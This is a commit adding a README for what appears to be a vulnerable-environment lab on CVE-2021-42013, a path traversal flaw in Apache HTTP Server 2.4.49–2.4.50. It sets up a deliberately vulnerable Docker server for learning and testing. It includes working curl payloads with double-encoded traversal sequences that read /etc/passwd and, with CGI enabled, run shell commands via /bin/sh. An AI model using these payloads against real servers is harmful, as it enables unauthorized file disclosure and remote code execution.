first commit

httpd/CVE-2021-42013/README.md

@@ -0,0 +1,47 @@
+# Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.50 (CVE-2021-42013)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows.
+
+CVE-2021-42013 is a vulnerability that caused by incomplete fix of [CVE-2021-41773](https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2021-41773), an attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.
+
+This vulnerability affects Apache HTTP Server 2.4.49 and 2.4.50 and not earlier versions.
+
+References:
+
+- https://httpd.apache.org/security/vulnerabilities_24.html
+- https://twitter.com/roman_soft/status/1446252280597078024
+
+## Vulnerable environment
+
+Execute following commands to start a vulnerable Apache HTTP Server:
+
+```
+docker compose build
+docker compose up -d
+```
+
+After the server is started, you can see the default page which says `It works!` of Apache HTTP Server through `http://your-ip:8080`.
+
+## Exploit
+
+Apache HTTP Server 2.4.50 patched the previous CVE-2021-41773 payload such as `http://your:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd`, but it was incomplete.
+
+Use `.%%32%65` to bypass the patches (Note that `/icons/` must be a existing directory):
+
+```
+curl -v --path-as-is http://your-ip:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
+```
+
+The `/etc/passwd` is disclosured successfully:
+
+![](1.png)
+
+With the mods cgi or cgid enabled on the server, this path traversal vulnerability would allow arbitrary command execution:
+
+```
+curl -v --data "echo;id" 'http://your-ip:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
+```
+
+![](2.png)